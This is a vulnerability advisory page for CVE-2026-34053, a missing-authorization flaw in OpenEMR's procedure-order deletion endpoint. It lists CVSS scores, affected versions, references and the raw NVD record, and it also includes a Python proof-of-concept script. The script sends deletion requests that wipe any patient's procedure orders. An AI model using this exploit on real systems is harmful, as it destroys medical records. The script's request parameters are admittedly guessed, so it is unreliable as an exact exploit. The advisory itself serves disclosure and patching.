CVE-2026-34053

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.3, missing authorization in the AJAX deletion endpoint `interface/forms/procedure_order/handle_deletions.php` allows any authenticated user, regardless of role, to irreversibly delete procedure orders, answers, and specimens belonging to any patient in the system. Version 8.0.0.3 patches the issue.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* - VULNERABLE

OpenEMR < 8.0.0.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_openemr(target_url, session_cookie, target_pid, order_id):
    """
    Exploit CVE-2026-34053: Unauthorized Deletion in OpenEMR.
    """
    # The vulnerable endpoint
    endpoint = "/interface/forms/procedure_order/handle_deletions.php"
    
    # Headers with the authenticated session
    headers = {
        "Cookie": f"OpenEMR={session_cookie}",
        "User-Agent": "Mozilla/5.0 (Exploit Client)"
    }
    
    # Payload to delete a specific procedure order
    # Adjust parameters based on actual form requirements
    payload = {
        "mode": "delete", 
        "pid": target_pid,  # Patient ID to target
        "proc_order_id": order_id # Procedure Order ID to delete
    }
    
    try:
        response = requests.post(target_url + endpoint, data=payload, headers=headers)
        
        if response.status_code == 200:
            print(f"[+] Success: Data deleted for PID {target_pid}, Order {order_id}")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed: HTTP {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Example usage
    # Replace with actual target details
    TARGET = "http://localhost/openemr"
    SESSION = "valid_session_id_here"
    exploit_openemr(TARGET, SESSION, "1", "100")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34053
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34053
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34053/
[4] VulDB https://vuldb.com/cve/CVE-2026-34053
[5] https://github.com/openemr/openemr/commit/7a16b731af7d34ffd92155fe2a5692fa1a67858e
[6] https://github.com/openemr/openemr/releases/tag/v8_0_0_3
[7] https://github.com/openemr/openemr/security/advisories/GHSA-3vvq-pfq6-pw98
[8] https://github.com/openemr/openemr/security/advisories/GHSA-3vvq-pfq6-pw98

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34053", "sourceIdentifier": "[email protected]", "published": "2026-03-26T00:16:41.057", "lastModified": "2026-03-26T16:17:22.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.3, missing authorization in the AJAX deletion endpoint `interface/forms/procedure_order/handle_deletions.php` allows any authenticated user, regardless of role, to irreversibly delete procedure orders, answers, and specimens belonging to any patient in the system. Version 8.0.0.3 patches the issue."}, {"lang": "es", "value": "OpenEMR es una aplicación de gestión de registros de salud electrónicos y práctica médica de código abierto y gratuita. Antes de la versión 8.0.0.3, la falta de autorización en el endpoint de eliminación AJAX 'interface/forms/procedure_order/handle_deletions.php' permite a cualquier usuario autenticado, independientemente de su rol, eliminar irreversiblemente órdenes de procedimientos, respuestas y muestras pertenecientes a cualquier paciente en el sistema. La versión 8.0.0.3 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.0.0.3", "matchCriteriaId": "E3E098AF-42A1-4798-85A7-80052F19F809"}]}]}], "references": [{"url": "https://github.com/openemr/openemr/commit/7a16b731af7d34ffd92155fe2a5692fa1a67858e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openemr/openemr/releases/tag/v8_0_0_3", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-3vvq-pfq6-pw98", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-3vvq-pfq6-pw98", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}